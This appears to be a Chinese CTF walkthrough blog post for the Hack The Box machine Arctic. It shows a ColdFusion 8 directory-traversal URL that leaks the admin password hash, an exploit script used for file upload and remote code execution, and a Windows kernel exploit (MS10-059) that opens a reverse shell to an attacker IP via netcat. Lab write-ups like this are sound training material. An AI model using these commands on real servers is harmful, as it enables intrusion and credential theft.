HTB-Arctic

简单难度

端口扫描

135/tcp open msrpc 8500/tcp open fmtp 49154/tcp open unknown

进入cfide,浏览./CFIDE/显示了adobe的应用程序(专门用于创建动态网页以及网络应用程序和设计的开发工具)。再进去到adminstrator,发现了一个名为Adobe Cold Fusion 版本 8的中央管理系统 (CMS)

searchsploit Cold Fusion ,这边我利用了文件上传和rce都不行,利用目录遍历的可以

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

%00en.可能该网站正在确保locale以合理的字符串结尾,,然后得到admin的hash值

登入来到后台

coldfusion8后台计划任务拿shell_coldfusion shell-优快云博客这是它百度找到提权的文章

文件上传我没成功但是具体的操作是

searchsploit -m 50057.py

这里的脚本有 LHOST、LPORT、RHOST 和 RPORT,需要对其进行编辑。它还表明它制作了一个 java (JSP) 有效负载并使用 post 请求将其上传到网络服务器。在其上方,它显示了“执行有效负载”和“侦听器连接”的定义,以定义脚本导航到执行有效负载的位置,并使用 netcat 捕获 shell。

执行

python3 ./50057.py

这是直接利用meter的

ColdFusion 8.0.1 Arbitrary File Upload and Execute

成功获得第一个flag

提权:

systeminfo

和上台一样是Windows 2008 R2 服务器没打补丁且土豆提权的前提有 可以利用试试(这边先不用)

试试用工具

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git

python -m pip install xlrd

root@kali# /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update

将(sysinfo的信息复制到文件里)

python2.7 windows-exploit-suggester.py --database 2023-12-04-mssb.xls -i system.txt 

可能工具太老了,用不了

用一下MS10-059 

windows-kernel-exploits/MS10-059: Chimichurri at master · egre55/windows-kernel-exploits · GitHub

本地smbserver.py share .

靶机net use \\10.10.14.47\share

copy \\10.10.14.47\share\Chimichurri.exe .

\Chimichurri.exe 10.10.14.47 443

kali监听rlwrap nc -nvlp 443

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值